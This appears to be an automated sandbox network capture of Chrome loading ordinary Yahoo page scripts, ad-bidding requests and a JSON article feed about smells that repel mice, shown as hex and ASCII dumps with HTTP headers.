                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: nction(r){r&&"mouseenter"===t&&e.destroy()})}},{key:"offsetY",set:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0;this._util.offsetY=this._util.offsetY||e}},{key:"offsetX",set:function(){var e=arguments.length>0&&void 0!==argumen
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2e 6b 65 79 2c 6e 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 72 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 72 29 2c 6e 26 26 65 28 74 2c 6e 29 2c 74 7d 7d 28 29 2c 41 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 75 74 69 6c 73 2c 45 3d 41 2e 62 69 6e 64 45 76 65 6e 74 2c 78 3d 41 2e 65 61 63 68 2c 53 3d 41 2e 65 6c 65 6d 65 6e 74 49 6e 56 69 65 77 2c 58 3d 41 2e 74 68 72 6f 74 74 6c 65 2c 59 3d 41 2e 75 6e 62 69 6e 64 45 76 65 6e 74 2c 49 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 62 61 73 65 2c 4c 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 63 6f 6e 74 72 6f 6c 6c 65 72 73 2e 57 61 66 65 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ritable=!0),Object.defineProperty(e,n.key,n)}}return function(t,r,n){return r&&e(t.prototype,r),n&&e(t,n),t}}(),A=window.wafer.utils,E=A.bindEvent,x=A.each,S=A.elementInView,X=A.throttle,Y=A.unbindEvent,I=window.wafer.base,L=window.wafer.controllers.Wafer
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 22 68 61 6e 64 6c 65 52 65 73 69 7a 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 6d 61 70 4f 66 66 73 65 74 28 29 2c 74 68 69 73 2e 5f 76 61 6c 69 64 61 74 65 57 69 74 68 54 68 72 6f 74 74 6c 65 28 29 7d 7d 2c 7b 6b 65 79 3a 22 77 69 6c 6c 44 65 73 74 72 6f 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 74 68 69 73 2e 5f 6f 70 74 69 6f 6e 73 2e 63 6f 6e 74 61 69 6e 65 72 3b 74 26 26 78 28 74 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 59 28 74 2c 22 73 63 72 6f 6c 6c 22 2c 65 2e 5f 76 61 6c 69 64 61 74 65 57 69 74 68 54 68 72 6f 74 74 6c 65 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 64 69 64 53 79 6e 63 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: "handleResize",value:function(){this._mapOffset(),this._validateWithThrottle()}},{key:"willDestroy",value:function(){var e=this,t=this._options.container;t&&x(t,function(t){Y(t,"scroll",e._validateWithThrottle)})}},{key:"didSync",value:function(){var e=th
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC237INData Raw: 2d 70 61 72 73 65 49 6e 74 28 63 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 2a 70 2f 31 30 30 2c 31 30 29 29 2c 21 76 26 26 28 6c 2e 69 6e 73 74 61 6e 63 65 2e 6f 66 66 73 65 74 58 3d 2d 70 61 72 73 65 49 6e 74 28 63 2e 63 6c 69 65 6e 74 57 69 64 74 68 2a 64 2f 31 30 30 2c 31 30 29 29 7d 7d 63 61 74 63 68 28 65 29 7b 72 3d 21 30 2c 6e 3d 65 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 21 74 26 26 6f 2e 72 65 74 75 72 6e 26 26 6f 2e 72 65 74 75 72 6e 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 72 29 74 68 72 6f 77 20 6e 7d 7d 7d 7d 5d 29 2c 74 7d 28 4c 29 2c 42 3d 56 3b 74 2e 64 65 66 61 75 6c 74 3d 6e 65 77 20 42 28 7b 73 65 6c 65 63 74 6f 72 3a 22 2e 77 61 66 65 72 2d 62 65 61 63 6f 6e 22 7d 29 7d 7d 29 7d 29 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: -parseInt(c.clientHeight*p/100,10)),!v&&(l.instance.offsetX=-parseInt(c.clientWidth*d/100,10))}}catch(e){r=!0,n=e}finally{try{!t&&o.return&&o.return()}finally{if(r)throw n}}}}]),t}(L),B=V;t.default=new B({selector:".wafer-beacon"})}})});


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    124192.168.2.44988254.154.153.2414434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1062OUTGET /bid/yoo/adslot/13885/?pa=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: gps-aa.ybp.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:21:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 1367
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Allow-Fledge: true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1367INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 28 28 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 72 75 6e 20 3d 20 28 29 20 3d 3e 20 7b 0a 0a 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 6f 72 69 67 69 6e 20 3d 20 22 68 74 74 70 73 3a 2f 2f 70 61 2e 79 62 70 2e 79 61 68 6f 6f 2e 63 6f 6d 22 3b 0a 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 69 6e 74 65 72 65 73 74 47 72 6f 75 70 73 20 3d 20 5b 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6e 61 6d 65 3a 20 22 33 33 38 32 37 38 36 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 77 6e 65 72 3a 20 60 24 7b 6f 72 69 67 69 6e 7d 60 2c 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <!doctype html><html lang="en"><body> <script> (() => { const run = () => { const origin = "https://pa.ybp.yahoo.com"; const interestGroups = [{ name: "3382786", owner: `${origin}`,


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    125192.168.2.44988587.248.119.2514434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1422OUTGET /caas/content/article/?uuid=8551ac12-1fc9-3d5d-ab15-8e6326882e08,7a673a73-42b0-3bbf-8576-5ad2cdb23c41,73240f47-271e-3691-bf46-85ad4f19d81c&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=900,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1pa4ckpjflnfm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC638INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-powered-by: Express
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-methods: GET, OPTIONS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-length: 141052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    etag: W/"226fc-8uFjKz27TiFiHXo7Vu0jcsr17ow"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    date: Mon, 30 Sep 2024 17:21:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-upstream-service-time: 44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC762INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 7b 22 69 74 65 6d 73 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 22 70 61 72 74 6e 65 72 44 61 74 61 22 3a 7b 22 61 64 4d 65 74 61 22 3a 7b 22 68 61 73 68 74 61 67 22 3a 22 67 61 72 64 65 6e 22 2c 22 69 73 53 75 70 70 6c 79 53 65 67 6d 65 6e 74 22 3a 22 66 61 6c 73 65 22 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 55 53 22 2c 22 72 73 22 3a 22 6c 6d 73 69 64 3a 61 30 61 36 54 30 30 30 30 30 52 30 52 30 74 51 41 46 3b 72 65 76 73 70 3a 74 68 65 5f 73 70 72 75 63 65 5f 31 38 38 3b 6c 70 73 74 61 69 64 3a 38 35 35 31 61 63 31 32 2d 31 66 63 39 2d 33 64 35 64 2d 61 62 31 35 2d 38 65 36 33 32 36 38 38 32 65 30 38 3b 70 74 3a 63 6f 6e 74 65 6e 74 3b 70 64 3a 6d 6f 64 61 6c 3b 76 65 72 3a 6d 65 67 61 73 74 72 6d 3b 70 63 74 3a 73 74 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"garden","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0a6T00000R0R0tQAF;revsp:the_spruce_188;lpstaid:8551ac12-1fc9-3d5d-ab15-8e6326882e08;pt:content;pd:modal;ver:megastrm;pct:sto
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 5b 7b 22 74 65 72 6d 22 3a 22 57 49 4b 49 49 44 3a 47 65 74 74 79 5f 49 6d 61 67 65 73 22 2c 22 6c 61 62 65 6c 22 3a 22 47 65 74 74 79 20 49 6d 61 67 65 73 22 2c 22 63 61 70 41 62 74 53 63 6f 72 65 22 3a 22 30 2e 39 36 38 22 2c 22 6d 65 74 61 44 61 74 61 22 3a 5b 7b 22 76 69 73 69 62 6c 65 22 3a 22 66 61 6c 73 65 22 7d 5d 2c 22 73 74 61 72 74 63 68 61 72 22 3a 32 35 37 2c 22 65 6e 64 63 68 61 72 22 3a 32 36 38 2c 22 73 70 65 63 69 61 6c 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 22 66 69 67 63 61 70 74 69 6f 6e 22 5d 2c 22 69 6e 73 74 61 6e 63 65 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 22 66 69 67 63 61 70 74 69 6f 6e 22 5d 7d 2c 7b 22 74 65 72 6d 22 3a 22 22 2c 22 6c 61 62 65 6c 22 3a 22 6d 6f 75 73 65 20 70 72 6f 62 6c 65 6d 22 2c 22 63 61 70 41 62 74 53 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: [{"term":"WIKIID:Getty_Images","label":"Getty Images","capAbtScore":"0.968","metaData":[{"visible":"false"}],"startchar":257,"endchar":268,"specialParentTags":["figcaption"],"instanceParentTags":["figcaption"]},{"term":"","label":"mouse problem","capAbtSc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 31 2e 30 22 2c 22 6c 61 62 65 6c 22 3a 22 22 7d 5d 2c 22 66 61 63 74 75 61 6c 50 6f 6c 6c 49 64 22 3a 6e 75 6c 6c 2c 22 66 69 6e 61 6c 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 6c 69 66 65 73 74 79 6c 65 2f 31 35 2d 73 6d 65 6c 6c 73 2d 6d 69 63 65 2d 68 61 74 65 2d 6b 65 65 70 2d 31 31 30 30 30 30 38 34 32 2e 68 74 6d 6c 22 2c 22 68 61 73 53 63 72 69 62 62 6c 65 22 3a 66 61 6c 73 65 2c 22 68 61 73 53 6c 69 63 6b 56 69 64 65 6f 22 3a 66 61 6c 73 65 2c 22 68 61 73 58 72 61 79 53 69 64 65 52 61 69 6c 22 3a 66 61 6c 73 65 2c 22 68 65 72 6f 4d 6f 64 75 6c 65 22 3a 7b 7d 2c 22 68 69 64 65 41 6c 6c 41 64 73 22 3a 66 61 6c 73 65 2c 22 68 6f 73 74 65 64 54 79 70 65 22 3a 22 68 6f 73 74 65 64 22 2c 22 68 72 65 66 4c 61 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 1.0","label":""}],"factualPollId":null,"finalUrl":"https://www.yahoo.com/lifestyle/15-smells-mice-hate-keep-110000842.html","hasScribble":false,"hasSlickVideo":false,"hasXraySideRail":false,"heroModule":{},"hideAllAds":false,"hostedType":"hosted","hrefLan
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 72 65 61 74 6f 72 22 3a 66 61 6c 73 65 2c 22 62 72 61 6e 64 55 72 6c 22 3a 6e 75 6c 6c 7d 2c 22 70 75 62 6c 69 73 68 44 61 74 65 22 3a 22 4d 6f 6e 2c 20 33 30 20 53 65 70 20 32 30 32 34 20 31 31 3a 30 30 3a 30 30 20 47 4d 54 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 22 54 68 65 20 53 70 72 75 63 65 22 2c 22 70 75 62 6c 69 73 68 65 72 4d 65 74 61 22 3a 7b 22 72 65 76 73 70 22 3a 22 74 68 65 5f 73 70 72 75 63 65 5f 31 38 38 22 7d 2c 22 73 61 6c 69 65 6e 74 45 6e 74 69 74 69 65 73 22 3a 5b 5d 2c 22 73 65 61 72 63 68 4e 6f 49 6e 64 65 78 22 3a 66 61 6c 73 65 2c 22 73 68 61 72 65 49 6d 61 67 65 22 3a 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 6e 79 2f 61 70 69 2f 72 65 73 2f 31 2e 32 2f 52 53 67 50 6f 5a 67 6e 42 2e 6c 4d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: reator":false,"brandUrl":null},"publishDate":"Mon, 30 Sep 2024 11:00:00 GMT","publisher":"The Spruce","publisherMeta":{"revsp":"the_spruce_188"},"salientEntities":[],"searchNoIndex":false,"shareImage":{"url":"https://s.yimg.com/ny/api/res/1.2/RSgPoZgnB.lM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 65 49 64 20 63 6f 6e 74 65 6e 74 46 65 65 64 62 61 63 6b 45 6e 61 62 6c 65 64 20 65 6e 61 62 6c 65 41 64 46 65 65 64 62 61 63 6b 56 32 20 65 6e 61 62 6c 65 49 6e 41 72 74 69 63 6c 65 41 64 20 65 6e 61 62 6c 65 4f 70 69 6e 69 6f 6e 4c 61 62 65 6c 20 65 6e 61 62 6c 65 53 69 6e 67 6c 65 53 6c 6f 74 74 69 6e 67 20 65 6e 61 62 6c 65 56 69 64 65 6f 44 6f 63 6b 69 6e 67 20 6f 75 74 53 74 72 65 61 6d 20 73 68 6f 77 43 6f 6d 6d 65 6e 74 73 49 63 6f 6e 57 69 74 68 44 79 6e 61 6d 69 63 43 6f 75 6e 74 20 65 6e 61 62 6c 65 53 74 69 63 6b 79 41 64 73 20 73 68 6f 77 43 6f 6d 6d 65 6e 74 73 49 63 6f 6e 49 6e 53 68 61 72 65 53 65 63 20 65 6e 61 62 6c 65 41 64 53 6c 6f 74 73 4e 65 77 4d 61 70 20 65 6e 61 62 6c 65 47 41 4d 41 64 73 20 65 6e 61 62 6c 65 47 41 4d 41 64 73 4f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: eId contentFeedbackEnabled enableAdFeedbackV2 enableInArticleAd enableOpinionLabel enableSingleSlotting enableVideoDocking outStream showCommentsIconWithDynamicCount enableStickyAds showCommentsIconInShareSec enableAdSlotsNewMap enableGAMAds enableGAMAdsO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 72 73 5c 22 7d 27 20 64 61 74 61 2d 6c 61 6e 67 3d 65 6e 2d 55 53 20 64 61 74 61 2d 74 7a 3d 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 20 64 61 74 61 2d 70 61 72 61 6d 73 3d 27 7b 5c 22 66 65 61 74 75 72 65 73 5c 22 3a 7b 5c 22 65 6e 61 62 6c 65 45 56 50 6c 61 79 65 72 5c 22 3a 74 72 75 65 2c 5c 22 65 6e 61 62 6c 65 4f 76 65 72 72 69 64 65 53 70 61 63 65 49 64 5c 22 3a 74 72 75 65 2c 5c 22 63 6f 6e 74 65 6e 74 46 65 65 64 62 61 63 6b 45 6e 61 62 6c 65 64 5c 22 3a 74 72 75 65 2c 5c 22 65 6e 61 62 6c 65 41 64 46 65 65 64 62 61 63 6b 56 32 5c 22 3a 74 72 75 65 2c 5c 22 65 6e 61 62 6c 65 49 6e 41 72 74 69 63 6c 65 41 64 5c 22 3a 74 72 75 65 2c 5c 22 65 6e 61 62 6c 65 4f 70 69 6e 69 6f 6e 4c 61 62 65 6c 5c 22 3a 74 72 75 65 2c 5c 22 65 6e 61 62 6c 65 53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: rs\"}' data-lang=en-US data-tz=America/New_York data-params='{\"features\":{\"enableEVPlayer\":true,\"enableOverrideSpaceId\":true,\"contentFeedbackEnabled\":true,\"enableAdFeedbackV2\":true,\"enableInArticleAd\":true,\"enableOpinionLabel\":true,\"enableS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1145INData Raw: 74 69 6f 6e 2f 6a 73 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 7b 5c 22 6c 6f 6e 67 46 6f 72 6d 5c 22 3a 7b 5c 22 77 65 65 6b 64 61 79 5c 22 3a 5c 22 73 68 6f 72 74 5c 22 2c 5c 22 64 61 79 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 2c 5c 22 68 6f 75 72 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 2c 5c 22 68 6f 75 72 43 79 63 6c 65 5c 22 3a 5c 22 68 31 32 5c 22 2c 5c 22 6d 69 6e 75 74 65 5c 22 3a 5c 22 32 2d 64 69 67 69 74 5c 22 2c 5c 22 6d 6f 6e 74 68 5c 22 3a 5c 22 6c 6f 6e 67 5c 22 2c 5c 22 79 65 61 72 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 2c 5c 22 74 69 6d 65 5a 6f 6e 65 4e 61 6d 65 5c 22 3a 5c 22 73 68 6f 72 74 5c 22 7d 2c 5c 22 73 68 6f 72 74 46 6f 72 6d 5c 22 3a 7b 5c 22 64 61 79 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 2c 5c 22 6d 6f 6e 74 68 5c 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: tion/json>\n {\"longForm\":{\"weekday\":\"short\",\"day\":\"numeric\",\"hour\":\"numeric\",\"hourCycle\":\"h12\",\"minute\":\"2-digit\",\"month\":\"long\",\"year\":\"numeric\",\"timeZoneName\":\"short\"},\"shortForm\":{\"day\":\"numeric\",\"month\"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 6f 62 6f 72 64 65 72 20 63 61 61 73 2d 62 6f 64 79 2d 63 6f 6c 6c 61 70 73 65 2d 62 75 74 74 6f 6e 5c 22 20 64 61 74 61 2d 79 6c 6b 3d 5c 22 69 74 63 3a 31 3b 73 6c 6b 3a 52 65 61 64 20 66 75 6c 6c 20 61 72 74 69 63 6c 65 5c 22 3e 52 65 61 64 20 66 75 6c 6c 20 61 72 74 69 63 6c 65 3c 69 3e 3c 2f 69 3e 3c 2f 62 75 74 74 6f 6e 3e 3c 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 62 6f 64 79 2d 69 6e 6e 65 72 2d 77 72 61 70 70 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 62 6f 64 79 2d 73 65 63 74 69 6f 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 63 6f 6e 74 65 6e 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 62 6f 64 79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: oborder caas-body-collapse-button\" data-ylk=\"itc:1;slk:Read full article\">Read full article<i></i></button><div><div class=caas-body-inner-wrapper><div class=caas-body-section><div class=caas-content><div class=caas-content-wrapper><div class=caas-body
